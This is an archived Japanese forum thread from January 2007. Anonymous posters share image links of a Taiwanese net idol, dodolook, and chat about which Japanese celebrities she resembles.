http://funimg.pchome.com.tw/img_upload/TEACHER/e/d/20061118_edison10704lan_151349.jpg
http://funimg.pchome.com.tw/img_upload/NETPAL/g/l/20061212_gloria5477_190643.jpg
http://funimg.pchome.com.tw/img_upload/NETPAL/y/e/20061203_yecty_33852_125058.jpg
http://funimg.pchome.com.tw/img_upload/NETPAL/c/c/20060828_cchheerry_135146.jpg
http://funimg.pchome.com.tw/img_upload/TEACHER/u/0/20061223_u0w9h6_160134.jpg

292 :美麗島の名無桑:2007/01/09(火) 00:10:12
>>291
見れないんだけど。

293 :美麗島の名無桑:2007/01/09(火) 00:11:33
垂れ目萌え。日本人は下垂眼の人が多くないか?

294 :美麗島の名無桑:2007/01/09(火) 02:10:36
日本人=( ´∀`)

295 :美麗島の名無桑:2007/01/09(火) 12:03:17
>>291
全然見えないよ

296 :美麗島の名無桑:2007/01/09(火) 15:51:08
dodolookは綾瀬はるかに似てるね。

297 :美麗島の名無桑:2007/01/09(火) 21:01:30
dodolookのまとめサイトお気に入りから消しちゃったみたいだ・・・・

誰かURL貼ってくださいませお願いします

298 :美麗島の名無桑:2007/01/09(火) 21:03:02
すんません見つけました

299 :美麗島の名無桑:2007/01/09(火) 21:28:22
黒渋会のMeiMeiが、似てないか?
まぁ、MeiMei自身がネットアイドル出身だけどな

300 :美麗島の名無桑:2007/01/09(火) 21:55:20
アニメ好きだしblogもよく更新するしょこたんに似てるよね。

301 :美麗島の名無桑:2007/01/09(火) 22:44:34
どどるくはギザカワユスヾ(o゚ω゚o)ノ゙

302 :美麗島の名無桑:2007/01/09(火) 23:36:20
しょこたんには全然似てないと思う・・・

303 :美麗島の名無桑:2007/01/10(水) 00:08:34
大沢あかねが正月の番組で中国に行ってたけどちょっと煮てたような。

304 :美麗島の名無桑:2007/01/10(水) 00:59:46
大沢あかね は、垂れ目っぽいところが似てるけど。
良く見てみ、大沢あかね は、ゴッツクて、ジャガー横田に
見えてくるよ。

305 :美麗島の名無桑:2007/01/10(水) 15:22:26
妹が今月号のNONNO買って来たけど表紙が綾瀬はるかだった。
まあ眼の辺りが似てるような気もするけどね。

306 :美麗島の名無桑:2007/01/10(水) 16:40:16
夢がないね

307 :美麗島の名無桑:2007/01/10(水) 16:44:41
Blogの写真かわええ!!
つかカナダにもnon-noあるの?

67 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)